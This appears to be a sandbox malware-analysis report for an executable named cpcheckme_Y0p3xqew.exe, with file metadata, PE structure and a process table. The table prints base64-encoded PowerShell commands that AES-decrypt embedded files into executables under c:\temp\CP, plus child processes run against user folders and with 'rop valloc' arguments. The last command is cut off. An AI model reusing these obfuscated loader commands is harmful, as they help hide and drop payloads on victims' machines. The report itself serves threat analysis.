| File name: | cpcheckme_Y0p3xqew.exe |
| Full analysis: | https://app.any.run/tasks/4b510639-e041-419d-8ac2-16906b425cdf |
| Verdict: | Malicious activity |
| Analysis date: | May 20, 2019, 21:19:17 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 48980DA8368191161EBBA4189C32E22F |
| SHA1: | F2F75928F40CE9CDC44B8E3FB01A0533B6784876 |
| SHA256: | 39DC3C1AD97563442D53D62FB4CF97FC5C684A58098ECBB8617811A8760C7E0A |
| SSDEEP: | 24576:wyUIhgsAvqgbWk3BRv9lo71WqakVggf6ZNflJQnhGUl5Gzy9Koj6V83+5g7itUvn:FUIVAiQW+BRlle9VggiZN9JQncu5Gzyb |
| .exe | | | InstallShield setup (36.8) |
|---|---|---|
| .exe | | | Win32 Executable MS Visual C++ (generic) (26.6) |
| .exe | | | Win64 Executable (generic) (23.6) |
| .dll | | | Win32 Dynamic Link Library (generic) (5.6) |
| .exe | | | Win32 Executable (generic) (3.8) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2018:04:02 18:06:34+02:00 |
| PEType: | PE32 |
| LinkerVersion: | 12 |
| CodeSize: | 65024 |
| InitializedDataSize: | 1392640 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x5139 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
| Architecture: | IMAGE_FILE_MACHINE_I386 |
|---|---|
| Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Compilation Date: | 02-Apr-2018 16:06:34 |
| Detected languages: |
|
| Debug artifacts: |
|
| Magic number: | MZ |
|---|---|
| Bytes on last page of file: | 0x0090 |
| Pages in file: | 0x0003 |
| Relocations: | 0x0000 |
| Size of header: | 0x0004 |
| Min extra paragraphs: | 0x0000 |
| Max extra paragraphs: | 0xFFFF |
| Initial SS value: | 0x0000 |
| Initial SP value: | 0x00B8 |
| Checksum: | 0x0000 |
| Initial IP value: | 0x0000 |
| Initial CS value: | 0x0000 |
| Overlay number: | 0x0000 |
| OEM identifier: | 0x0000 |
| OEM information: | 0x0000 |
| Address of NE header: | 0x000000F8 |
| Signature: | PE |
|---|---|
| Machine: | IMAGE_FILE_MACHINE_I386 |
| Number of sections: | 5 |
| Time date stamp: | 02-Apr-2018 16:06:34 |
| Pointer to Symbol Table: | 0x00000000 |
| Number of symbols: | 0 |
| Size of Optional Header: | 0x00E0 |
| Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
.text | 0x00001000 | 0x0000FCCB | 0x0000FE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.64783 |
.rdata | 0x00011000 | 0x00006DA2 | 0x00006E00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.74157 |
.data | 0x00018000 | 0x00003380 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.73132 |
.rsrc | 0x0001C000 | 0x00148808 | 0x00148A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.58439 |
.reloc | 0x00165000 | 0x00001314 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.39281 |
Title | Entropy | Size | Codepage | Language | Type |
|---|---|---|---|---|---|
1 | 4.91161 | 381 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 2.14675 | 2216 | UNKNOWN | English - United States | RT_ICON |
3 | 2.93257 | 744 | UNKNOWN | English - United States | RT_ICON |
4 | 2.14675 | 2216 | UNKNOWN | English - United States | RT_ICON |
107 | 2.37447 | 34 | UNKNOWN | English - United States | RT_GROUP_ICON |
108 | 2.49212 | 34 | UNKNOWN | English - United States | RT_GROUP_ICON |
130 | 7.59743 | 1338648 | UNKNOWN | English - United States | BINARY |
KERNEL32.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 344 | PowerShell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ACIAKQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACkACgB7AAoACQAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAJACQAYwBzAEUAbgBjAHIAeQBwAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACwAIAAiAFcAcgBpAHQAZQAiAAoACQAKAAkAaQBmACAAKAAhACQAYwBzAEUAbgBjAHIAeQBwAHQAKQAKAAkAewAKAAkACQB0AGgAcgBvAHcAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBOAG8AdABGAG8AdQBuAGQARQB4AGMAZQBwAHQAaQBvAG4AXQAgACIARgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAC4AIgAgAAoACQB9AAoACgAJAHQAcgB5AAoACQB7AAoACQAJACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKAAoACQAJAHcAaABpAGwAZQAgACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAC0AbgBlACAAMAApAAoACQAJAHsACgAJAAkACQAkAGMAcwBFAG4AYwByAHkAcAB0AC4AVwByAGkAdABlACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsACgAJAAkACQAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAJAAkAfQAKAAkAfQAKAAkAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAJAHsACgAJAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAUAByAG8AYwBlAHMAcwBvAHIAKQAKAHsACgAJACQAaQBuAHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAiAE8AcABlAG4AIgAsACAAIgBSAGUAYQBkACIACgAJAGkAZgAgACgAIQAkAGkAbgBwAHUAdAAgAC0AbwByACAAKAAkAGkAbgBwAHUAdAAgAC0AaQBzAG4AbwB0ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AXQApACkACgAJAHsACgAJAAkAdABoAHIAbwB3ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUATgBvAHQARgBvAHUAbgBkAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAiACQASQBuAHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuACIAIAAKAAkAfQAKAAoACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAJAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACAALQBvAHIAIAAoACQAbwB1AHQAcAB1AHQAIAAtAGkAcwBuAG8AdAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AKQApAAoACQB7AAoACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAJAH0ACgAKACAAIAAgACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACAAJABvAHUAdABwAHUAdAAgACQAUAByAG8AYwBlAHMAcwBvAHIACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AJABBAGUAcwApAAoAewAKAAkAJABkAGUAYwByAHkAcAB0AG8AcgAgAD0AIAAkAEEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAIAAkAEkAbgBwAHUAdABGAGkAbABlACAAJABPAHUAdABwAHUAdABGAGkAbABlACAAJABkAGUAYwByAHkAcAB0AG8AcgAgACQAZAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEMAcgBlAGEAdABlAEEAZQBzACgAJABCAGEAcwBlADYANABLAGUAeQBEAGEAdABhACkACgB7AAoACQBbAGIAeQB0AGUAWwBdAF0AJABrAGUAeQBEAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEIAYQBzAGUANgA0AEsAZQB5AEQAYQB0AGEAKQAKAAkAJABtAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACwAJABrAGUAeQBEAGEAdABhACkACgAJACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQgBpAG4AYQByAHkAUgBlAGEAZABlAHIAIAAkAG0AcwAKACAAIAAgACAACgAJACQAYQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoACQAKACAAIAAgACAAJABzAGkAegBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEkAbgB0ADMAMgAoACkAOwAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAHIAZQBhAGQAZQByAC4AUgBlAGEAZABCAHkAdABlAHMAKAAkAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAkAHMAaQB6AGUAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQASQBuAHQAMwAyACgAKQA7AAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAQgB5AHQAZQBzACgAJABzAGkAegBlACkAOwAKAAkACgAJAHIAZQB0AHUAcgBuACAAJABhAGUAcwAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAZQBjAHIAeQBwAHQAVwBpAHQAaABLAGUAeQBkAGEAdABhACgAWwBzAHQAcgBpAG4AZwBdACQARgBpAGwAZQBUAG8ARABlAGMAcgB5AHAAdAAsACAAWwBzAHQAcgBpAG4AZwBdACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAWwBzAHQAcgBpAG4AZwBdACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQApAAoAewAKAAkAJABhAGUAcwAgAD0AIABDAHIAZQBhAHQAZQBBAGUAcwAgACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQAKAAkACQAJAAoACQBEAGUAYwByAHkAcAB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAVABvAEQAZQBjAHIAeQBwAHQAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIAAkAGEAZQBzAAoACQByAGUAdAB1AHIAbgAgADEACgB9AAoAJABpAG4AIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAFoARAAuAGUAeABlACIACgAkAG8AdQB0ACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAEMAUABfAFoARAAuAGUAeABlACIACgAkAGsAZQB5AGQAYQB0AGEAIAA9ACAAIgBFAEEAQQBBAEEARgB1AHgAZwA4ADkAeABIAE0AQgA5AHYAUgBmAHoAWgBxAHYAKwByAFkAYwBnAEEAQQBBAEEAeQA0AGUATgBGADcAWQBLAC8AVwBFAE4AaABNAGwAMwBvAEkASgBZAHYAZwBGAGkAaQBXADMAcABBAFIAQgBuADEAZQAzAHQAWABPAEwAaABRAGgAMAA9ACIACgAKAHIAZQB0AHUAcgBuACAARABlAGMAcgB5AHAAdABXAGkAdABoAEsAZQB5AGQAYQB0AGEAIAAkAGkAbgAgACQAbwB1AHQAIAAkAGsAZQB5AGQAYQB0AGEA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 620 | c:\temp\CP\CP_AR.exe "C:\Users\admin\Documents\CP_AR_files_Y0p3xqewydnmx2wi_ju1" "C:\Users\admin\Pictures\CP_AR_files_Y0p3xqew3ox44ble_apv" | c:\temp\CP\CP_AR.exe | — | wmiprvse.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 4294967295 Modules
| |||||||||||||||
| 996 | c:\temp\CP\CP_AE.exe 3920 rop valloc | c:\temp\CP\CP_AE.exe | — | wmiprvse.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2496 | PowerShell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ACIAKQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACkACgB7AAoACQAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAJACQAYwBzAEUAbgBjAHIAeQBwAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACwAIAAiAFcAcgBpAHQAZQAiAAoACQAKAAkAaQBmACAAKAAhACQAYwBzAEUAbgBjAHIAeQBwAHQAKQAKAAkAewAKAAkACQB0AGgAcgBvAHcAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBOAG8AdABGAG8AdQBuAGQARQB4AGMAZQBwAHQAaQBvAG4AXQAgACIARgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAC4AIgAgAAoACQB9AAoACgAJAHQAcgB5AAoACQB7AAoACQAJACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKAAoACQAJAHcAaABpAGwAZQAgACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAC0AbgBlACAAMAApAAoACQAJAHsACgAJAAkACQAkAGMAcwBFAG4AYwByAHkAcAB0AC4AVwByAGkAdABlACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsACgAJAAkACQAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAJAAkAfQAKAAkAfQAKAAkAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAJAHsACgAJAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAUAByAG8AYwBlAHMAcwBvAHIAKQAKAHsACgAJACQAaQBuAHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAiAE8AcABlAG4AIgAsACAAIgBSAGUAYQBkACIACgAJAGkAZgAgACgAIQAkAGkAbgBwAHUAdAAgAC0AbwByACAAKAAkAGkAbgBwAHUAdAAgAC0AaQBzAG4AbwB0ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AXQApACkACgAJAHsACgAJAAkAdABoAHIAbwB3ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUATgBvAHQARgBvAHUAbgBkAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAiACQASQBuAHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuACIAIAAKAAkAfQAKAAoACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAJAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACAALQBvAHIAIAAoACQAbwB1AHQAcAB1AHQAIAAtAGkAcwBuAG8AdAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AKQApAAoACQB7AAoACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAJAH0ACgAKACAAIAAgACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACAAJABvAHUAdABwAHUAdAAgACQAUAByAG8AYwBlAHMAcwBvAHIACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AJABBAGUAcwApAAoAewAKAAkAJABkAGUAYwByAHkAcAB0AG8AcgAgAD0AIAAkAEEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAIAAkAEkAbgBwAHUAdABGAGkAbABlACAAJABPAHUAdABwAHUAdABGAGkAbABlACAAJABkAGUAYwByAHkAcAB0AG8AcgAgACQAZAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEMAcgBlAGEAdABlAEEAZQBzACgAJABCAGEAcwBlADYANABLAGUAeQBEAGEAdABhACkACgB7AAoACQBbAGIAeQB0AGUAWwBdAF0AJABrAGUAeQBEAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEIAYQBzAGUANgA0AEsAZQB5AEQAYQB0AGEAKQAKAAkAJABtAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACwAJABrAGUAeQBEAGEAdABhACkACgAJACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQgBpAG4AYQByAHkAUgBlAGEAZABlAHIAIAAkAG0AcwAKACAAIAAgACAACgAJACQAYQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoACQAKACAAIAAgACAAJABzAGkAegBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEkAbgB0ADMAMgAoACkAOwAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAHIAZQBhAGQAZQByAC4AUgBlAGEAZABCAHkAdABlAHMAKAAkAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAkAHMAaQB6AGUAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQASQBuAHQAMwAyACgAKQA7AAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAQgB5AHQAZQBzACgAJABzAGkAegBlACkAOwAKAAkACgAJAHIAZQB0AHUAcgBuACAAJABhAGUAcwAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAZQBjAHIAeQBwAHQAVwBpAHQAaABLAGUAeQBkAGEAdABhACgAWwBzAHQAcgBpAG4AZwBdACQARgBpAGwAZQBUAG8ARABlAGMAcgB5AHAAdAAsACAAWwBzAHQAcgBpAG4AZwBdACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAWwBzAHQAcgBpAG4AZwBdACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQApAAoAewAKAAkAJABhAGUAcwAgAD0AIABDAHIAZQBhAHQAZQBBAGUAcwAgACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQAKAAkACQAJAAoACQBEAGUAYwByAHkAcAB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAVABvAEQAZQBjAHIAeQBwAHQAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIAAkAGEAZQBzAAoACQByAGUAdAB1AHIAbgAgADEACgB9AAoAJABpAG4AIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAEEAUgAuAGUAeABlACIACgAkAG8AdQB0ACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAEMAUABfAEEAUgAuAGUAeABlACIACgAkAGsAZQB5AGQAYQB0AGEAIAA9ACAAIgBFAEEAQQBBAEEARgB1AHgAZwA4ADkAeABIAE0AQgA5AHYAUgBmAHoAWgBxAHYAKwByAFkAYwBnAEEAQQBBAEEAeQA0AGUATgBGADcAWQBLAC8AVwBFAE4AaABNAGwAMwBvAEkASgBZAHYAZwBGAGkAaQBXADMAcABBAFIAQgBuADEAZQAzAHQAWABPAEwAaABRAGgAMAA9ACIACgAKAHIAZQB0AHUAcgBuACAARABlAGMAcgB5AHAAdABXAGkAdABoAEsAZQB5AGQAYQB0AGEAIAAkAGkAbgAgACQAbwB1AHQAIAAkAGsAZQB5AGQAYQB0AGEA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2880 | PowerShell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ACIAKQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACkACgB7AAoACQAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAJACQAYwBzAEUAbgBjAHIAeQBwAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACwAIAAiAFcAcgBpAHQAZQAiAAoACQAKAAkAaQBmACAAKAAhACQAYwBzAEUAbgBjAHIAeQBwAHQAKQAKAAkAewAKAAkACQB0AGgAcgBvAHcAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBOAG8AdABGAG8AdQBuAGQARQB4AGMAZQBwAHQAaQBvAG4AXQAgACIARgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAC4AIgAgAAoACQB9AAoACgAJAHQAcgB5AAoACQB7AAoACQAJACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKAAoACQAJAHcAaABpAGwAZQAgACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAC0AbgBlACAAMAApAAoACQAJAHsACgAJAAkACQAkAGMAcwBFAG